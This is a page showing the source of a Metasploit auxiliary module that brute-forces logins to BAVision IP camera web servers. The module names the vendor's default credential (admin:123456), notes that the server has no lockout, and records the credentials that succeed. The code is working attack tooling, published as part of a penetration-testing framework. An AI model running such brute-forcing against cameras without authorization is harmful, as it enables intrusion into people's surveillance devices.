Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'metasploit/framework/login_scanner/bavision_cameras'
7
require 'metasploit/framework/credential_collection'
8
9
class MetasploitModule < Msf::Auxiliary
10
include Msf::Exploit::Remote::HttpClient
11
include Msf::Auxiliary::AuthBrute
12
include Msf::Auxiliary::Report
13
include Msf::Auxiliary::Scanner
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => 'BAVision IP Camera Web Server Login',
20
'Description' => %q{
21
This module will attempt to authenticate to an IP camera created by BAVision via the
22
web service. By default, the vendor ships a default credential admin:123456 to its
23
cameras, and the web server does not enforce lockouts in case of a bruteforce attack.
24
},
25
'Author' => [ 'sinn3r' ],
26
'License' => MSF_LICENSE,
27
'Notes' => {
28
'Reliability' => UNKNOWN_RELIABILITY,
29
'Stability' => UNKNOWN_STABILITY,
30
'SideEffects' => UNKNOWN_SIDE_EFFECTS
31
}
32
)
33
)
34
35
register_options(
36
[
37
OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])
38
]
39
)
40
end
41
42
def scanner(ip)
43
@scanner ||= lambda {
44
cred_collection = build_credential_collection(
45
username: datastore['USERNAME'],
46
password: datastore['PASSWORD']
47
)
48
49
if datastore['TRYDEFAULT']
50
# Add the default username and password
51
print_status("Default credential admin:123456 added to the credential queue for testing.")
52
cred_collection.add_public('admin')
53
cred_collection.add_private('123456')
54
end
55
56
return Metasploit::Framework::LoginScanner::BavisionCameras.new(
57
configure_http_login_scanner(
58
host: ip,
59
port: datastore['RPORT'],
60
cred_details: cred_collection,
61
stop_on_success: datastore['STOP_ON_SUCCESS'],
62
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
63
connection_timeout: 5,
64
http_username: datastore['HttpUsername'],
65
http_password: datastore['HttpPassword']
66
)
67
)
68
}.call
69
end
70
71
def report_good_cred(ip, port, result)
72
service_data = {
73
address: ip,
74
port: port,
75
service_name: 'http',
76
protocol: 'tcp',
77
workspace_id: myworkspace_id
78
}
79
80
credential_data = {
81
module_fullname: self.fullname,
82
origin_type: :service,
83
private_data: result.credential.private,
84
private_type: :password,
85
username: result.credential.public,
86
}.merge(service_data)
87
88
login_data = {
89
core: create_credential(credential_data),
90
last_attempted_at: DateTime.now,
91
status: result.status,
92
proof: result.proof
93
}.merge(service_data)
94
95
create_credential_login(login_data)
96
end
97
98
def report_bad_cred(ip, rport, result)
99
invalidate_login(
100
address: ip,
101
port: rport,
102
protocol: 'tcp',
103
public: result.credential.public,
104
private: result.credential.private,
105
realm_key: result.credential.realm_key,
106
realm_value: result.credential.realm,
107
status: result.status,
108
proof: result.proof
109
)
110
end
111
112
def bruteforce(ip)
113
scanner(ip).scan! do |result|
114
case result.status
115
when Metasploit::Model::Login::Status::SUCCESSFUL
116
print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
117
report_good_cred(ip, rport, result)
118
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
119
vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
120
report_bad_cred(ip, rport, result)
121
when Metasploit::Model::Login::Status::INCORRECT
122
vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
123
report_bad_cred(ip, rport, result)
124
end
125
end
126
end
127
128
def run_host(ip)
129
unless scanner(ip).check_setup
130
print_brute(:level => :error, :ip => ip, :msg => 'Target is not BAVision IP camera web server.')
131
return
132
end
133
134
bruteforce(ip)
135
end
136
end
137
138